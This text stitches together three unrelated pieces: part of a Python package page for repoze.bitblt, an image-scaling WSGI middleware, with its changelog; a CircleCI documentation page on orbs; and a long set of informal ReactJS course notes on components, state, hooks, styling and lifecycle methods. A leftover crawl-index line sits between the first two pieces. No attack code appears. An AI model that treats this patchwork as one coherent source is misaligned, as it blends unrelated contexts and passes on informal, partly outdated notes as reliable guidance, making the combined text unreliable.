A minimal cache implementation is available with the cache parameter. It should be the path to a directory where generated images will be saved. This is a very simplistic approach that does not use any possibly related HTTP header at all: Last-Modified, Expires, etc. The only way to refresh or empty the cache is to delete the files. This feature is disabled by default.
Usage
The middleware operates in two phases, on HTML documents and images respectively.
When processing HTML documents, it looks for image tags in the document soup:
<img src="some_image.png" width="640" height="480" />
In the case it finds such an image element, it rewrites the URL to include scaling information which the middleware will read when the image is served through it.
The image will be proportionally scaled, so it fits into the given size. If you only set one of width or height, then the image will only be limited to that, but still proportionally scaled.
This effectively means that application developers needn’t worry about image scaling; simply put the desired size in the HTML document.
Note that this middleware is protected from DoS attacks (which is important for any middleware that does significant processing) by signing all URLs with an SHA digest signature.
Contributing
The development of repoze.bitblt happens at github:
Credits
- Malthe Borch <mborch@gmail.com>
- Stefan Eletzhofer <stefan.eletzhofer@inquant.de>
- Jeroen Vloothuis <jeroen.vloothuis@xs4all.nl>
- Florian Schulze <florian.schulze@gmx.net>
Changelog
0.9 (released 2012-10-18)
- Maintain embedded ICC Profiles in images. Requires PIL 1.1.7 or later.
- Add simplistic cache implementation. [damien]
- Remove paragraph in readme which mentions the try_xhtml option. It’s now a no-op. [jinty]
- Use PATH_INFO directly to avoid blowing up on non UTF-8 paths.
0.8 (released 2010-03-01)
The major change in the 0.8 release was a rewrite of the <img> tag search and replace to use regexs rather than lxml. It was proving too hard to prevent lxml from mangling low quality HTML in nasty ways. The new regex based search/replace takes a lot of care to only modify what is necessary.
Side effects of this change are a reduction of dependencies and theoretically better performance.
- Work with unclosed <img> tags (HTML4). [jinty]
- Re-write rewrite_image_tags to use regular expressions to find/mangle img tags. As well aas removing the dependency on lxml this prevents a whole class of bugs where lxml was changing the HTML source too much, see. Backwards compatibility for the ‘ImageTransformationMiddleware’ class was preserved by leaving the try_xhtml argument in place. It is now a no-op. [jinty]
- Make sure resizing preserves GIF transparency. [jinty]
- Fix bug where <![CDATA[ escaped sections would be quoted and the CDATA stripped. This causes foulups when quoting Javascript. [jinty]
- Properly rewrite <img> tags with pixel (e.g. height=”100px”) attributes, previously the url generated missed the regex resulting in broken images. [jinty]
- Don’t rewrite <img> tags with percentage sizes, only the browser knows how big the images should be. See. [jinty]
- Use unicode_body all over to ensure correct encoding. [jinty]
- Fixed bug where the leading slash of an absolute URL without the FQDN would be wrongly removed. [damien]
- Fixed bug where the quality-parameter would not be coerced to integer, required by PIL. [damien]
- Compatibility with Python 2.4. [malthe]
0.7 (released 2009-03-18)
- Don’t use python 2.6 syntax. [seletz]
- Handle empty content bodies, which can occure for redirects. [fschulze]
- Added support for xhtml, which allows the inclusion of namespace tags. [fschulze]
- Added option to limit the url rewriting to urls below the application url. [fschulze]
- Added scaling filter support. [fschulze]
- Support image tags with only one of the width or height attributes set. [fschulze]
- Fix UnboundLocalError for respones with untransformed image. [fschulze]
- Fix importing of PIL. The old way assumed the broken egg installation. [fschulze]
- Made tests run. [fschulze]
0.6 (released 2008-10-11)
- Require to pass in a secret parameter to configure middleware security. [malthe]
0.5 (released 2008-10-11)
- Rewritten URLs are now signed by the middleware to ensure that bitblt requests are only crafted by the middleware. This is required to shield against DoS attacks. [malthe]
0.4 (released 2008-10-11)
- Fixed path handling. [malthe]
- Added HTML document processing which scans document for image tags and rewrite image src attribute to include “bitblt” traversing directive. This makes it work as an actual middleware, since the application semantics are then unchanged. [malthe]
- No longer accept query parameters, but instead require traversing directive “/bitblt-<width>x<height>”. [malthe]
- Removed functionality to MIME-type convert. [malthe]
0.3 (released 2008-10-10)
- Made logic robust to unexpected parameters. [malthe]
- Fixed bug where parameters would be drawn from the WSGI environment. [malthe]
- Added mimetype conversion. [malthe]
0.2 (released 2008-10-08)
- Fixed entry point name.
0.1 (released 2008-10-03)
- Initial release.
- Author: Malthe Borch
- Keywords: web middleware wsgi pil image transformation
- License: BSD-derived ()
- Categories
- Package Index Owner: seletz, malthe, jinty
- DOAP record: repoze.bitblt-0.9.xml | https://pypi.python.org/pypi/repoze.bitblt | CC-MAIN-2017-04 | refinedweb | 975 | 59.9 |
Orbs Introduction
CircleCI Orbs are shareable packages of configuration elements, including jobs, commands, and executors. CircleCI provides certified orbs, along with 3rd-party orbs authored by CircleCI partners. It is best practice to first evaluate whether any of these existing orbs will help you in your configuration workflow. Refer to the CircleCI Orbs Registry for the complete list of certified orbs.
Importing an Existing Orb
To import an existing orb, add a single line to to your version 2.1 .circleci/config.yml file for each orb, for example:
version: 2.1 orbs: slack: circleci/slack@0.1.0 heroku: circleci/heroku@0.0.1
In the above example, two orbs are imported into your config, the Slack orb and the Heroku orb.
Note: If your project was added to CircleCI prior to 2.1, you must enable Build Processing to use the
orbs key.
Authoring Your Own Orb
If you find that there are no existing orbs that meet your needs, you may author your own orb to meet your specific environment or configuration requirements by using the CircleCI CLI as shown in the
circleci orb help output below. Although this is more time-consuming than using the import feature, authoring your own orb enables you to create a world-readable orb for sharing your configuration. See Creating Orbs for more information.
$ circleci orb help Operate on orbs Usage: circleci orb [command] Available Commands: create Create an orb in the specified namespace list List orbs process Validate an orb and print its form after all pre-registration processing publish Publish an orb to the registry source Show the source of an orb validate Validate an orb.yml
Note When authoring an orb, you will agree to CircleCI’s Code Sharing Terms of Service when your organization opts-in to 3rd party orb use and authoring. CircleCI thereby licenses all orbs back to users under the MIT License agreement.
Importing Partner Orbs
Import the following Partner Orbs by using the
orbs key in your
.circleci.yml/config.yml file and replacing
<orb reference string> with one from the table.
version: 2.1 orbs: <orb reference string>
Note: As a prerequisite, you must enable use of 3rd-party orbs on the Settings > Security page for your org.
See Also
- Refer to Using Orbs, for more about how to use existing orbs.
- Refer to Creating Orbs, where you will find step-by-step instructions on how to create your own orb.
- Refer to. | https://circleci.com/docs/2.0/orb-intro/ | CC-MAIN-2019-13 | refinedweb | 411 | 53.71 |
ReactJS Notes
Page Contents
Course Notes
These are notes from the Udemy course React - The Complete Guide by Maximilian Schwarzmüller. It's a great course, give it a go!
Intro
react
react-dom
babel - translates next-gen JavaScript to browser-compatible JavaScript

A React component is just a function that has to return the code to render to the DOM.

JSX - needs babel as the preprocessor that converts JSX to normal JavaScript code.
JSX - requires one root div!

function Person(props) {
    // React automatically gives me the props parameter - the component properties.
    return (
        <div className="person"> {/* NOTE: className, not class! This is a JSX thing - class is a reserved word in JS so it can't be used. */}
            <h1>{props.name}</h1>
            <p>Some stuff: {props.stuff}</p>
        </div>
    );
}

// Render a JavaScript function as a component to the real DOM inside the div with id "p1":
ReactDOM.render(<Person name="John" stuff="Whatever"/>, document.querySelector('#p1'));

Could also do:

const app = (
    <div>
        <Person name="John" stuff="blah"/>
        <Person name="Peter" stuff="blah"/>
    </div>
);
ReactDOM.render(app, document.querySelector('#app'));  // A single page application

React focuses on the what, not the how - focus on what you want to see rather than managing individual UI state and keeping track of it all.
Todo / To Read / Good Reads.
Some Resources
- create-react-app:
- Introducing JSX:
- Rendering Elements:
- Components & Props:
- Listenable Events:
Setup Local React Project
Build a workflow - optimize code, lint, make code cross-browser compatible using babel and jsx etc. Need - dependency management tool, e.g. npm bundler - put all our JS modules into one file - use webpack compiler - next-gen JS to older-JS = babel + presets dev server to test on ^^^^ There is a react-team supported tool that does all this for us! -- `npm install -g create-react-app` - only using nodeJS for the package manager and the dev server Use command create-react-app react-complete-guide --scripts-version 1.1.5 Creates a folder called `react-complete-guide` in the CWD CD into `react-complete-guide` and type `npm start` to start the development server. It server watches your files so if you change code it will auto-reload it for you!! tip: Try out `Rescripts`, which is used to modify create-react-app's webpack configuration, without ejecting the app... woop woop! ()
React Component Basics
Every component needs a `render()` method - it returns an object that react can use to render content to the HTML DOM.

> Components are the core building block of React apps. Actually, React
> really is just a library for creating components in its core.
> A typical React app therefore could be depicted as a component tree -
> having one root component ("App") and then a potentially infinite number
> of nested child components.
> Each component needs to return/render some JSX code - it defines
> which HTML code React should render to the real DOM in the end.

JSX v.s. React
--------------
JSX is syntactic sugar that needs to be translated into javascript code. For example "<div></div>" would be translated into React.createElement('div', props-object, child1 [,child2[,...]]), where the children are also created using React.createElement(...).

JSX restrictions
1. Cannot use JS reserved keywords
2. Must have ONE root element, normally a DIV.
   - The way round this is to use a HOC that just returns its children.
   - In react >= 16.2 you don't have to create this HOC yourself - it is provided and is called "React.Fragment".

Creating Basic Components
-------------------------
Directory and file(s) in that directory for each component, with the same name as the component, normally using a capitalised first letter.
In file
- import React from 'react.js';
- const component_name = (...) 
=> { return SOME-REACT-ELEMENTS-VIA-JSX; }
- export default component_name;

In root component file:
- import Component_name from './Component_name/Component_name.js' <- Name must start with an upper-case character because elements starting lower case are reserved for HTML node names
- then use <Component_name>...</Component_name>

To get JSX code to execute and use the output of a JS function (can only use one-line expressions), wrap the code in curly braces - {}

Props
-----
Allow us to pass attributes (and children) specified in the JSX/HTML code to the JS component so that it can display content dynamically. Note the props object passed to the component should *NOT* be modified by the component.

If the component is constructed using a function, the function gets one parameter - the props object.

    const component_name = (props) => {
      return <div>
               <p>I am {props.age} years old.</p>
               <p>I live in the country {props.country}</p>
             </div>;
    };

If the component is constructed using a class then in the render() method use `this.props.age`, for example. The props are automatically made available as `this.props` for you.

To access children, e.g. <Component_name>Some text in the middle</Component_name>, use `props.children`, which is created by react for us. It will contain all elements between the opening and closing tags of the component, plain text, or an element tree...

You can pass METHODS as props so that other components can access methods from, say, the main app, for example. This could allow a child component to change data in the parent component. It is a useful pattern.

!!!! Whether you declare a component as a function or a class, it must never modify its own props. !!!!

State
-----
Only for classes extending `Component` (and see also React hooks for function based components) PRE React 16.8. 
Function based components can, since React 16.8, use the useState() hook.

Create a class variable named `state`, which should be a JS object with keys, as you want to define them, mapping to values of interest. The variable is SPECIAL because if it changes it will trigger React to re-render the DOM with the updated data BUT ONLY IF YOU USE `this.setState()`.

!! NOTE you must use `this.setState()` to TRIGGER RE-RENDERING OF DOM
!! Do not modify the state variable directly
!! setState() takes an object as argument and merges it with the class state object for us.
!!
!! NOTE THE FOLLOWING !!
!!
!! It does not immediately trigger the render, it merely schedules a render, so the state won't be
!! updated until React determines it is a "good time" to do that.
!!
!! Because of this, "this.state" in "setState()" is NOT GUARANTEED TO BE THE LATEST/NEWEST
!! STATE OF THE OBJECT!!!! It could be an older state. This is because React may batch multiple
!! setState() calls into a single update for performance.
!!
!! See:
!! See rationale for async setState:
!!
!! This means using setState like this can sometimes cause problems:
!!    someFunc = () => {
!!        setState({something: this.state.something + 1});
!!        //                   ^^^^^^^^^^
!!        //                   WARNING - this could be a STALE STATE
!!    };
!!
!! The correct way to do this is as follows:
!!    someFunc = () => {
!!        setState((prevState, props) => {
!!            return {
!!                something: prevState.something + 1
!!            };
!!        });
!!    };
!!
!! This uses the alternative setState syntax which accepts a function that receives the previous
!! state and the component's props. React can then call this function when it is ready to set
!! a new state. The prevState that is passed to this function is GUARANTEED BY REACT TO BE THE
!! MOST RECENT STATE THAT YOU WOULD NORMALLY EXPECT.

Generally only PROPS and STATE changes cause react to re-render the DOM.

Anything using state is a stateful component. Otherwise it is stateless. 
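The stale-state problem above can be illustrated with a tiny stand-in for React's batching. This mock (makeComponent, its pending queue, and flush()) is invented for illustration - it is NOT how React is implemented - but it shows why the object form can lose updates while the updater-function form cannot:

```javascript
// Toy model of setState batching - NOT React's real implementation.
function makeComponent(initialState) {
  const component = {
    state: initialState,
    pending: [],                         // queued updates, applied later in one batch
    setState(update) { component.pending.push(update); },
    flush() {                            // React applying the batch at a "good time"
      for (const update of component.pending) {
        const partial = typeof update === 'function'
          ? update(component.state)      // updater form: gets the freshest state
          : update;                      // object form: was computed from possibly stale state
        component.state = { ...component.state, ...partial };
      }
      component.pending = [];
    },
  };
  return component;
}

// Object form: both calls read count=0 before the batch is applied -> a lost update.
const a = makeComponent({ count: 0 });
a.setState({ count: a.state.count + 1 });
a.setState({ count: a.state.count + 1 });
a.flush();                               // a.state.count === 1, not 2!

// Updater form: each function receives the previous pending state -> correct.
const b = makeComponent({ count: 0 });
b.setState(prev => ({ count: prev.count + 1 }));
b.setState(prev => ({ count: prev.count + 1 }));
b.flush();                               // b.state.count === 2
```

The same lost-update behaviour happens in a real component when two `setState({...this.state...})` calls land in the same React batch.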
Design to have as few as possible stateful and as many as possible stateless (presentational) components.

!!!! YOU SHOULD NEVER MUTATE THE STATE VARIABLE - ALWAYS TAKE COPIES, ESP. FOR ARRAYS ETC., AND THEN CALL setState() !!!!

The same is true if the member is an object - you'd get a reference, not a copy of the object. Take a copy using:

    const objectMemberCopy = { ...this.state.objectReference };

OR old-school using Object.assign().
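A sketch in plain JavaScript of why copying matters (the `state` object here is just a stand-in for `this.state`):

```javascript
// Arrays and objects in the state are held by reference, so "copying" via
// plain assignment just aliases the same underlying data.
const state = { people: [{ name: 'John', age: 30 }], settings: { theme: 'dark' } };

// WRONG - this is a reference; mutating it would mutate the state directly:
const alias = state.people;
// alias[0].age = 31;   // would silently change state.people[0] behind React's back

// RIGHT - take copies, change the copy, then hand the copy to setState():
const peopleCopy = [...state.people];                 // new array (shallow copy)
const personCopy = { ...state.people[0], age: 31 };   // new object with one change
peopleCopy[0] = personCopy;

// state.people is untouched; only the copy carries the change:
// state.people[0].age === 30, peopleCopy[0].age === 31
```

Note the spread only copies one level deep, which is why the nested person object above needs its own copy too.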
Events & Handlers
All HTML attributes like onclick become onClick in JSX. See

In a class that extends `Component`, define an arrow function for the event handler (use an arrow function to correctly capture "this"). Then do, for e.g., <button onClick={this.eventHandler}>...</button>. When the button is clicked it will call the function `eventHandler()` of your class, which, if it then modifies the class state, will cause the component to be re-rendered into the DOM.

To pass data to a handler use the bind() method.

    <button onClick={this.myHandler.bind(this, param1, param2, ...)}>

If you've used arrow functions the binding to "this" isn't necessary - the arrow function will have captured it - but because we want to bind other parameters, we now have to have "this" as the first parameter to bind(). This is why with arrow functions we don't have to use bind() if there is no extra data to pass into the handler.

The other way to accomplish this is to use an arrow function, and it looks a little nicer IMO, BUT apparently it can be less efficient and bind() is therefore preferred.

    <button onClick={() => this.myHandler(param1, param2, ...)}>

Handling Events
---------------
* React events are named using camelCase, rather than lowercase.
* React event handlers are passed instances of SyntheticEvent, a cross-browser wrapper around the browser's native event. Same interface as the browser's native event.
* 'nativeEvent' attribute to get the underlying browser event object.
* SyntheticEvents are pooled.
* With JSX you pass a function as the event handler, rather than a string.
* Cannot return false to prevent default behavior in React. You must call preventDefault explicitly.

From: Wrapping native event instances can cause performance issues since every synthetic event wrapper that's created will also need to be garbage collected at some point, which can be expensive in terms of CPU time. React deals with this problem by allocating a synthetic instance pool. Whenever an event is triggered, it takes an instance from the pool, populates its properties and reuses it. When the event handler has finished running, all properties are nullified and the synthetic event instance is released back into the pool. Hence the increased performance.
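The bind-vs-arrow choice above can be shown in plain JS, no React needed. The `component` object and `fakeEvent` below are made up to stand in for a class instance and a SyntheticEvent:

```javascript
// How bind() pre-fills `this` and leading arguments.
const component = {
  clickedIndex: null,
  myHandler(index, event) {          // extra params first; the event object arrives last
    this.clickedIndex = index;
    return `row ${index} got event ${event.type}`;
  },
};

// What JSX like onClick={this.myHandler.bind(this, 2)} produces:
const bound = component.myHandler.bind(component, 2);

// What JSX like onClick={(e) => this.myHandler(2, e)} produces:
const viaArrow = (e) => component.myHandler(2, e);

// React later invokes the handler with the (synthetic) event:
const fakeEvent = { type: 'click' };
const boundResult = bound(fakeEvent);      // -> "row 2 got event click"
const arrowResult = viaArrow(fakeEvent);   // -> same result, but note a fresh arrow
                                           //    function is created on every render
```

The "fresh function per render" point is the efficiency argument in favour of bind(): a child receiving a new function prop each render looks changed even when nothing else did.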
Hooks
All React hooks are called "useXXX".

    import React, {useXXX, useYYY, ...} from 'react';

useState() hook
---------------
So, now instead of using the class `state` variable, in a function-based component do:

    const app = (props) => {
      const [ theCurrentState, theSetStateFunction ] = useState({... state object defn ...});

Now, where you would use `this.state` use `theCurrentState` and where you would use `setState()` use `theSetStateFunction()`.

And for your handler functions, just put them inside the component defn function and reference the function in the JSX returned. NOTE - the handler must be an arrow function so that it is lexically scoped and captures `theCurrentState` and `theSetStateFunction` in the enclosing component defn func.

    const app = (props) => {
      const [ theCurrentState, theSetStateFunction ] = useState({... state object defn ...});
      const myHandler = () => {
        theSetStateFunction({...});
      }
      return JSX-which-has-myHandler-as-an-onXXX-function;
    };

!!!!BUT CAUTION!!!!
theSetStateFunction() does **NOT** do a merge like setState() does. You must do the merge yourself manually! But you can get around this with many useState() calls - state "slices".

This is a new way - the class based method is still seemingly the standard.
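The merge-vs-replace caution can be made concrete with two tiny helper functions. These are illustrative stand-ins for the two update semantics, not React code:

```javascript
// this.setState() merges the partial update into the existing state:
function classStyleSetState(state, update) {
  return { ...state, ...update };
}

// The setter returned by useState() REPLACES the whole value:
function hookStyleSetter(state, update) {
  return update;
}

const initial = { name: 'John', age: 30 };

const merged = classStyleSetState(initial, { age: 31 });
// merged -> { name: 'John', age: 31 }   (name survives)

const replaced = hookStyleSetter(initial, { age: 31 });
// replaced -> { age: 31 }               (name is LOST!)

// With useState you therefore merge manually...
const manuallyMerged = { ...initial, age: 31 };
// ...or avoid the problem entirely with separate state slices:
// const [name, setName] = useState('John'); const [age, setAge] = useState(30);
```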
Css
Import CSS into your JS files so that WebPack is aware of its existence. Put the CSS for a component in the component's dir and use a class name the same as the component's name.

For things like "box-shadow", the build converts this CSS property to the different browser-prefixed variants like "-webkit-box-shadow" and "box-shadow" for us, so our CSS can be more brief and generic.

Inline styles
-------------
The style can be modified in the JS using inline styles. The CSS code ports almost directly to a JS object definition except REPLACE "-" WITH CAMEL CASE e.g.

    render() {
      const style = {
        backgroundColor: 'white',
        border: '1px solid blue',
        ...
      };
      return (
        <div style={style}>.....</div>
      );
    }

CSS Modules
-----------
See
See
See

A CSS Module is a CSS file in which all class names and animation names are scoped locally by default. It does this by automatically creating a unique classname of the format [filename]_[classname]__[hash]. This automatically creates CSS names that look a lot like the names you might create if you are using BEM CSS naming in a non-react project, where you need to name your classes to identify the blocks they refer to etc.

Use a CSS module like this:

    import styles from './Button.module.css'; // Import css modules stylesheet as styles
    ...
    class Button extends Component {
      render() {
        // reference as a js object
        return <button className={styles.Error}>Error Button</button>;
        //                        ^^^^^^^
        //                        Gets locally scoped Error CSS from the styles imported above.
        //                        So the CSS has a def `.Error { ... }`
      }
    }

Can also apply many classes to an object, using the normal string with spaces, by joining elements of an array. E.g.:

    <button className={[styles.Error, styles.Big].join(" ")}>...</button>

Can specify which style dynamically by using `styles['Big']`, e.g.:

    <button className={[styles.Error, styles[props.btnSize]].join(" ")}>...</button>

NOTE: react-scripts >= 2.0 you do NOT have to eject and CSS modules must be `*.module.css`. 
For react-scripts < 2.0, to enable CSS modules:

1. npm run eject

   From:. The eject command will have created a new top level directory, called "config", for you, which has received the above mentioned script copies. The "package.json" file will now also be A LOT larger. You can now see _all_ of your dependencies in detail.

2. Goto "ROOT/config/webpack.config.dev.js"

   Search "css-loader". You should see:

       {
         test: /\.css$/,
         use: [
           require.resolve('style-loader'),
           {
             loader: require.resolve('css-loader'),
             options: {
               importLoaders: 1,
             },
           },
           ...

   Add the following options, under "importLoaders":

       options: {
         importLoaders: 1,
         modules: true,
         localIdentName: '[name]__[local]__[hash:base64:5]',
       },

   Copy these two options into the production build file too!

This is all that is required. CSS modules should now be good to go!

Using Web Fonts
---------------
You can add includes of web fonts to "ROOT/public/index.html". Goto fonts.google.com, select and customise the font that you like, get the CDN link and shove it into index.html above the title tag.
Conditional Rendering
In JSX we can execute simple JS expressions in {...}. This means that we could render based on the ternary operator "cond ? true-path : false-path". Note cannot use if-else as this is too complicated. Could we use a function and immediately evaluate it though? Not sure - need to try. E.g., return ( <div> { this.state.someCondition ? <div> ... some tags ... </div> : null // "null" means nothing is rendered } ... </div> ); ^^^ This gets MESSY fast, especially when multiple conditions are nested. It is BETTER to do the FOLLOWING: let myElements = null; if(this.state.someCondition) { myElements = ( <div> ... some tags ... </div> ); } ... return ( <div> {myElements} </div> ); ^^^ This is EASIER TO READ AND MAINTAIN! Keeps our core JSX template CLEAN!
Rendering Lists
If the state, or whatever other variable, has a list of attributes for a list of like-tags we can do this:

    return (
      <div>
        {this.state.listMember.map((member, index) => {
          return <TheElement somehandler={someHandlerFunction.bind(this, index)}
                             prop1={member.prop1}
                             prop2={member.anotherProp}
                             key={index} />   // You SHOULD ALWAYS PROVIDE A KEY!!
        })}
      </div>
    );

The map() function returns an array - JSX knows how to render a list of ReactElement objects so this works okay.

NOTE - arrays are references to an array - so

    const arrayMemberRef = this.state.arrayMember; // Gets a reference to state.arrayMember!!
    arrayMemberRef[0] = 123; // !!!!WARNING!!!! This mutates the ReactJS managed state object which can produce UNDESIRABLE BEHAVIOUR
    this.setState({arrayMember : arrayMemberRef});

NOTE - When rendering lists of data ALWAYS USE THE KEY PROP. It helps react know what changed in the list more efficiently.
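Stripped of JSX, the map() pattern just produces an array of element descriptors, each carrying a `key`. The plain objects below only stand in for React elements (the real element shape is React-internal), and the immutable-update line shows the safe alternative to the mutation warned about above:

```javascript
const people = [
  { id: 'a1', name: 'John' },
  { id: 'b2', name: 'Peter' },
];

// What {people.map(...)} boils down to: an array of keyed descriptors.
const elements = people.map(person => ({
  type: 'Person',
  key: person.id,       // prefer a stable id over the array index where you have one
  props: { name: person.name },
}));
// elements[0].key === 'a1', elements[1].props.name === 'Peter'

// Immutable update of one list item - no mutation of `people`, so a
// subsequent setState({people: renamed}) is safe:
const renamed = people.map(p => (p.id === 'b2' ? { ...p, name: 'Pete' } : p));
// people[1].name is still 'Peter'; renamed[1].name is 'Pete'
```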
Use Pseudo Selectors In Javascript
Requires a package called "Radium". From your project directory:

    npm install --save radium

Radium lets pseudo selectors and media queries be used from the JS.

> import Radium from 'radium';

Then

> export default Radium(App)

to create a higher order component. Radium wraps your App. It can wrap both classes and function-based components.

With radium installed you can add the following to your style objects in JS code:

    const style = {
      color: 'white',
      ...,
      ':hover': {
        ... set of styles for the hover state ...
      },
      ':another-pseudo-selector': {
        ... another set of styles ...
      },
    };

You can also do media queries in the same way, EXCEPT you will have to use <StyleRoot> around your App:

In any component(s) you like:

    const style = {
      ...
      '@media (min-width: 500px)': {
        ...
      },
      ...
    };

Then in your app:

    import Radium, { StyleRoot } from 'radium';
    ...
    class App extends Component {
      ...
      render() {
        return (
          <StyleRoot>
            ... your original app content JSX ...
          </StyleRoot>
        );
      }
    }
Styled Components
styled-components.com

Tries to make styling components easy. Do:

    npm install --save styled-components

Use:

    import styled from 'styled-components';

    const StyledButton = styled.button`
      /* write regular CSS within the back ticks */
    `;

    const StyledDiv = styled.div`
      /* write regular CSS within the back ticks */
      &:hover {   /* <<<< Special way to add pseudo element styles using styled components */
      }
      color: ${props => props.altColor};   /* <<< Note use of ${...} to access props */
    `;
    ...
    class .... {
      ...
      render() {
        ...
        return(
          <!-- Note how props can be passed to styled components for dynamic CSS -->
          <StyledDiv altColor={this.state.my_colour_variable}>
            <StyledButton onClick={...}/>
            ...
          </StyledDiv>
        );
      }
      ...
    }

People seem to like this because you get scoped styles - i.e., they apply only to the component, not to the entire application. BUT - you are now mixing markup with code, which was the entire point of CSS/HTML separation in the first place!

BETTER? - Use CSS Modules - see the CSS section above.
Error Boundaries
See:

Only available in ReactJS >= 16.

Error boundaries allow us to catch errors (exceptions) and handle them gracefully. They are a form of Higher Order Component (HOC) - they wrap the component that may throw an error. Notes on this later.

    class ErrorBoundary extends Component {
      state = {
        hasError: false,
        errorMsg: '',
      }

      // this is a special method that react knows to call if any of the children
      // throw an exception
      componentDidCatch(error, info) {
        this.setState({hasError: true, errorMsg: error});
      }

      render() {
        if (this.state.hasError) {
          // If there was an error render something useful
          return <h1>{this.state.errorMsg}</h1>;
        } else {
          // Otherwise just display the components this component wraps
          return this.props.children;
        }
      }
    }

Then in your App render or whatever, just wrap any elements that may have failures that are _not_ under your control with <ErrorBoundary>....</ErrorBoundary> (class name just an example - you can choose). I.e. don't wrap everything - errors that _are_ under your control you should fix so that they cannot happen.
Class Based V.S. Functional Components
Class based:
  - Access to state
  - Lifecycle hooks

Function based:
  - ReactJS < 16.8: _no_ access to state; ReactJS >= 16.8 has access to state via useState()
  - _No_ access to lifecycle hooks (but see useEffect())
Class Component Lifecycle
See also >> Good diagram >>

Functional components have an equivalent but this is for class based components only.

ReactJS components have the following LIFE CYCLE HOOK methods:
- constructor(props) (default ES6 class feature, unlike the rest which are React specific)
- static getDerivedStateFromProps(props, state) should return updated state
- getSnapshotBeforeUpdate(prevProps, prevState)
- componentDidCatch()
- componentWillMount() [might be deprecated]
- componentWillUnmount() This can be used to do cleanup work like de-registering event handlers etc.
- shouldComponentUpdate(nextProps, nextState)
- componentDidUpdate(prevProps, prevState, snapshot) After the update finished. This is the most used method, e.g., to fetch new data from the server.
- componentDidMount()
- render()

Note: Life-cycle hooks are not, and have nothing to do with, React Hooks.

Creation life cycle hooks execute in this sequence:

CREATION
--> constructor(props) [must call super(props). Set state. Must have NO side-effects]

        constructor(props) {
          super(props);
          ... do other init stuff ...
          // Can init state here - but don't call setState() as there is nothing to merge with yet
          this.state = { ... };
        }

--> getDerivedStateFromProps(props, state) [Sync state when props changed - niche. Must have NO side-effects]
--> render() [Prepare and structure JSX code. Nothing that blocks!]
--> render all child components and run their life cycle hooks...
--> componentDidMount() [Do NOT update state (synchronously), but DO cause side effects, e.g., HTTP requests]

Component update (when props or state change) life cycle hooks execute in this sequence:

UPDATE
--> getDerivedStateFromProps(props, state) [rarely needed]
--> shouldComponentUpdate(nextProps, nextState) [Allows us to CANCEL the update process for optimisation.
    Do NOT cause side effects]
    Must return either true (do the update) or false (cancel the update)
--> render() [constructs virtual DOM for merge into the real DOM]
--> render all child components and run their life cycle hooks...
--> getSnapshotBeforeUpdate(prevProps, prevState)
    Must return either null or an object, which will be received in componentDidUpdate.
    An example might be getting the current scroll position so it can be restored in the next step.
--> componentDidUpdate(prevProps, prevState, snapshot) [NO (synchronous) state update but can cause side effects]

shouldComponentUpdate() is the one you will use for OPTIMISATION!

Optimising using shouldComponentUpdate()
----------------------------------------
If a parent component updates, but the specific child has not (another child or the main element might have), then the child can use shouldComponentUpdate() to stop itself being needlessly rendered into the ReactJS virtual DOM. For example,

    shouldComponentUpdate(nextProps, nextState) {
      // Big note - be careful - this compares references, so if the reference doesn't change
      // but the contents do, then this won't work! This is a SHALLOW comparison!
      return nextProps.propsOfInterest != this.props.propsOfInterest;
    }
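The shallow-comparison pitfall is pure JavaScript and can be demonstrated without React at all - `!==` on arrays and objects compares references, not contents:

```javascript
const oldProps = { items: [1, 2, 3] };

// Mutating in place keeps the SAME reference - a shouldComponentUpdate()
// style comparison would see "no change" and skip the update:
const mutated = oldProps.items;
mutated.push(4);
const changedAfterMutation = mutated !== oldProps.items;   // false - update wrongly skipped!

// Replacing with a copy yields a NEW reference - the comparison works:
const copied = [...oldProps.items, 5];
const changedAfterCopy = copied !== oldProps.items;        // true - update runs
```

This is another reason the "always take copies before setState()" rule matters: reference-based optimisations like shouldComponentUpdate(), PureComponent and React.memo() all rely on it.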
Functional Hooks
See:

> By using this Hook, you tell React that your component needs to do something after render.
> React will remember the function you passed (we'll refer to it as our "effect"), and call it
> later after performing the DOM updates.

Use the "useEffect()" hook.

    import React, { useEffect } from 'react';

useEffect() is the second most important ReactJS hook next to the useState() hook. It combines all of the class lifecycle hooks above into one function. It is _not_ a lifecycle hook, however; it is a React hook!

useEffect() takes a function as an argument that is called for each render cycle. It can be used for all the stuff that would be done in "componentDidUpdate()", e.g., an HTTP req. It also does "componentDidMount()" (called for the first render). You can use "useEffect()" as many times as you like.

    useEffect( () => { ... do stuff ... }, [list-of-data])
                                           ^^^^^^^^^^^^^^
               Second argument to useEffect(). It is a list of references to all of the data used
               in the function. The function will only run when a data item in this list changes.
               So, if we use "props.member", it would only be called when the props change. If you
               have a different effect that depends on different data, just use the function more
               than once.

To make the "useEffect()" function run only once, when the component is created, just pass a second argument that is an empty list - []. As there are no dependencies for the func, it will never be re-run because of a dependency change. But it will run once at creation.

> You can tell React to skip applying an effect if certain values haven't changed between
> re-renders. To do so, pass an array as an optional second argument to useEffect

If "useEffect()" returns a function, this function is run to clean up after the render cycle. Thus, you can return a function if you want to do some cleanup.

    useEffect( () => {
        ... do stuff ...
        return () => { ... do cleanup work ... };
    }, [])  // The empty list means the effect only runs when the component is created, not on
            // every render cycle (and the cleanup runs when the component is destroyed)

Optimisation
------------
Use React.memo() to wrap your functional component to memo-ise it!
When To Optimise
Not always is the answer! If a child always updates with its parent then there is no need to optimise, and using either shouldComponentUpdate() or React.memo() is actually inefficient as they will always find that the component changed - so it's extra work for no reason.

If you are checking ALL properties for change, you don't need to override shouldComponentUpdate(). You can, instead, extend PureComponent. This is just a component that implements shouldComponentUpdate() and checks for any change in props.
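Conceptually, what React.memo() and PureComponent add is "skip the render when a shallow comparison of the props finds no change". The sketch below models that idea with a memoized render function; it is an illustration of the technique, not React's actual implementation:

```javascript
// Shallow prop comparison: reference equality per key, as PureComponent does.
function shallowEqual(a, b) {
  const aKeys = Object.keys(a);
  if (aKeys.length !== Object.keys(b).length) return false;
  return aKeys.every(key => a[key] === b[key]);
}

// Wrap a "render function" so it is skipped when props are shallow-equal.
function memoize(renderFn) {
  let lastProps = null;
  let lastResult = null;
  let renders = 0;
  const memoized = props => {
    if (lastProps && shallowEqual(lastProps, props)) return lastResult;  // skip!
    renders += 1;
    lastProps = props;
    lastResult = renderFn(props);
    return lastResult;
  };
  memoized.renderCount = () => renders;
  return memoized;
}

const render = memoize(props => `Hello ${props.name}`);
render({ name: 'John' });   // renders
render({ name: 'John' });   // skipped - shallow-equal props
render({ name: 'Pete' });   // renders again
// render.renderCount() === 2
```

It also makes the "when to optimise" point concrete: if the props differ on every call, the shallowEqual() check always fails and is pure overhead.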
